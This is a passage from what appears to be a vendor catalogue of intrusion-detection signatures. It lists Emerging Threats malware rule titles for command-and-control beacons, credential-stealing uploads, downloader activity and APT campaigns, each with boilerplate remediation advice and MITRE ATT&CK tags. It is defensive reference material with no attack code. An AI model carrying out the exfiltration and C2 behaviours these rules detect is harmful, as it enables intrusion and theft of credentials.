ET MALWARE W32/BlackEnergy Dirconf CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32.Blackshades/Shadesrat Backdoor CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Bravix.Dropper CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Briba CnC POST Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Caphaw CnC Configuration File Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Caphaw Requesting Additional Modules From CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Citadel.Arx Variant CnC Beacon 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Citadel.Arx Varient CnC Beacon 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Citadel Conf.bin Download From CnC Server

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Citadel Content.php CnC POST

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Citadel Download From CnC Server /files/ attachment

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Citadel File.php CnC POST

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Citadel Infection or Config URL Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Citadel Pro File.php CnC POST

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Coced.PasswordStealer User-Agent 5.0

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Coinminer.Backdoor CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Resource Hijacking - T1496

ET MALWARE W32/Dadobra.Downloader/DNSChanger Dnsmake CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32.Daws/Sanny CnC Initial Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/DelfInject.A CnC Checkin 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Depyot.Downloader CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Dexter Infostealer CnC POST

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/DirCrypt.Ransomware CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE W32/DownloaderAgent.fajk Second Stage Download List Requested

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/DownloaderAgent.fajk Successful Infection CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Downloader.FakeFlashPlayer Status.Php CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Downloader.Mevade.FBV CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Downloader Secondary Download Request - W32/Hupigon.Backdoor Likely Secondary Payload

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32.Downloader Tibs.jy Reporting to C&C (2)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Downloader_x.EJK!tr CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Downvision.A Initial Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32.Dreambot File Upload (No Data Sent)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Dridex Binary Download Mar 23 2016

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Dridex POST CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Echmark CnC Activity M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Echmark/MarkiRAT CnC Activity M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Echmark/MarkiRAT CnC Host Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Echmark/MarkiRAT CnC Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Emotet CnC Beacon 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Emotet CnC Beacon 3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Emotet CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Emotet Empty CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Emotet.v4 Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/FakeAlert Fake Security Tool Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32.FakeEzQ.kr Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Farfli.BHQ!tr Dropper CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Farfli.BHQ!tr Dropper CnC Beacon 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Ferret DDOS Bot CnC Beacon 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Fin4.InfoStealer Uploading User Credentials CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/FloatingCloud.Banker CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Fsysna.Downloader CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Fullstuff Initial Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Gagolino Banking Trojan Reporting to CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/GamesForum.InfoStealer Reporting to CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/GameThief Initial CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Gaudox Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/GCman.Backdoor CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32.Geodo/Emotet Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32.Geodo/Emotet Checkin Fake 404 Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Goolbot.E Checkin UA Detected iamx

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/HelloBridge.Backdoor Login CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/HelloBridge.Backdoor Register CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Hesperus.Banker Nlog.php Variant Sending Data To CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Hesperus.Banker Tr-mail Variant Sending Data To CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Hicrazyk.A Downloader Install CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Hupigon.B User Agent TSDownload

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Hyteod.Downloader CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/InstallMonster.Downloader Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Iyus.H Initial CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Iyus.H work_troy.php CnC Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Karagany.Downloader CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Kazy.325252 Variant CnC Beacon 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Kazy.325252 Variant CnC Beacon 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Kazy User-Agent (Windows NT 5.1 ; v.) space infront of semi-colon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Kbot.Backdoor Variant CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Ke3chang.BMW.APT Campaign CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Ke3chang.Dream.APT Campaign CnC Beacon 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Ke3chang.MovieStar.APT Campaign CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Ke3chang.MyWeb.APT Campaign CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Ke3chang.MyWeb.APT Eourdegh Campaign CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Ke3chang.Snake.APT Campaign CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/KeyLogger.ACQH!tr Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Kimsuky Sending Encrypted System Information to CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Koobface Variant Checkin Attempt

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Lalus Trojan Downloader Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Lalus Trojan Downloader User Agent (Message Center)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/LetsGo.APT Sleep CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Lici Initial Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Liftoh.Downloader Feed404 CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Liftoh.Downloader Get Final Payload Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Liftoh.Downloader Images CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Lile.A DoS Outbound

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/LockscreenBEI.Scareware Cnc Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Madness Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Mepaow.Backdoor Initial Checkin to Intermediary Pre-CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Mevade.Variant CnC POST

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Mnless Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32.Nemim Checkin

Description
Copy link

